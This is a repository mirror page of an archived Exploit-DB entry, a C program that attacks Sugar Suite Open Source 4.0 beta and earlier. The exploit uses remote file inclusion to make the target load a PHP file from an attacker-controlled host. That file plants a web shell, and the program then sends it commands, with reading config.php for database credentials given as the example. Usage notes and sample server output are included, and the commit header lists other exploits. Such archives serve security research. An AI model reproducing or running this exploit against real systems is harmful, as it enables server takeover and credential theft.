bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/1364.c
Offensive Security 477bcbdcc0 DB: 2016-03-17 
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

145 lines
4.2 KiB
C
Executable file
Raw Blame History

/*
gcc -o sugar sugar.c
Usage ./sugar [host] [/path/] [site] [cmd]
Sugar Suite Open Source <= 4.0 beta remote code execution (c code)
coded by: pointslash v.
credits: rgod, unitedasia
host - hostname (ex: www.sitename.com)
path - path (ex: /sugar/ or just / )
site - remote location ( ex: http://www.somesite.com/file.txt)
cmd - specify a command ("cat config.php" to see database username & password)
example ./sugar www.victim.com /CRM35/ http://othersite.com/file.txt uname%20-a;
Put this in your file.txt
<?php
$fp=fopen("pointslash.php","w");
fputs($fp,"<? error_reporting(0);ini_set('max_execution_time',0); system(\$HTTP_GET_VARS[cmd]);?>");
fclose($fp);
?>
./sugar www.victim.com /CRM35/ http://othersite.com/file.txt ls%20-al
HTTP/1.1 200 OK
Date: Thu, 08 Dec 2005 12:35:33 GMT
Server: Apache/1.3.27 (Unix) (Red-Hat/Linux) PHP/4.3.10 mod_perl/1.27
X-Powered-By: PHP/4.3.10
Connection: close
Content-Type: text/html
Linux victim.com 2.4.9-e.57smp #1 SMP Thu Dec 2 20:51:12 EST 2004 i686 unknown
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#define HTTP_PORT 80
#define DATA "\ncompile gcc -o sugar sugar.c\n\nexample ./sugar www.victim.com /CRM35/ http://othersite.com/file.txt uname%%20-a;\n\nPut this in your file.txt\n\n<?php\n$fp=fopen(\"pointslash.php\",\"w\");\nfputs($fp,\"<? error_reporting(0);ini_set('max_execution_time',0); system(\\$HTTP_GET_VARS[cmd]);?>\");\nfclose($fp);\n?>\n\n"
/****************** MAIN *********************/
void sendpacket(char buffer[8192], int p, char host[100]);
int main( int argc, char **argv)
{
char buffer[8192];
int count;
char data[190];
if(argc<5)
{
printf("Usage %s [host] [/path/] [site] [cmd]\n\nSugar Suite Open Source <= 4.0 beta remote code execution (c code)\ncoded by: pointslash \ncredits: rgod, unitedasia\n\n",argv[0]);
printf("host - hostname (ex:www.sitename.com)\n");
printf("path - path (ex: /sugar/ or just / )\n");
printf("site - remote location ( ex: http://www.somesite.com/file.txt)\n");
printf("cmd - specify a command (\"cat config.php\" to see database username & password)\n");
sprintf(data, DATA);
printf(data);
exit(1);
}
sprintf( buffer, "GET %sacceptDecline.php?beanFiles[1]=%s&beanList[1]=1&module=1 HTTP/1.0\nUser-Agent: MantraAgent\nHost: %s\nConnection: Close\n\n", argv[2], argv[3], argv[1]);
sendpacket(buffer,0,argv[1]);
sprintf( buffer, "GET %spointslash.php?cmd=%s HTTP/1.0\nUser-Agent: Vagabondo/2.0 MT\nHost: %s\nConnection: Close\n\n", argv[2], argv[4], argv[1]);
sendpacket(buffer,1,argv[1]);
return count;
}
void sendpacket(char buffer[8192], int p, char host[100])
{
struct sockaddr_in server;
struct hostent *host_info;
unsigned long addr;
int sock;
char dat[8192];
int count;
/* create socket */
sock = socket( PF_INET, SOCK_STREAM, 0);
if (sock < 0) {
perror( "failed to create socket");
exit(1);
}
/* Create socketadress of Server
* it is type, IP-adress and portnumber */
memset( &server, 0, sizeof (server));
/* convert the Servername to a IP-Adress */
host_info = gethostbyname( host);
if (NULL == host_info) {
fprintf( stderr, "unknown server: %s\n", host);
exit(1);
}
memcpy( (char *)&server.sin_addr, host_info->h_addr, host_info->h_length);
server.sin_family = AF_INET;
server.sin_port = htons( HTTP_PORT);
/* connect to the server */
if ( connect( sock, (struct sockaddr*)&server, sizeof( server)) < 0) {
perror( "can't connect to server");
exit(1);
}
send( sock, buffer, strlen( buffer), 0);
/* get the answer from server and put it out to stdout */
if (p==1) {
do {
count = recv( sock, buffer, sizeof(buffer), 0);
write( 1, buffer, count);
}
while (count > 0);
}
/* close the connection to the server */
close ( sock);
}
// milw0rm.com [2005-12-08]
Reference in a new issue View git blame Copy permalink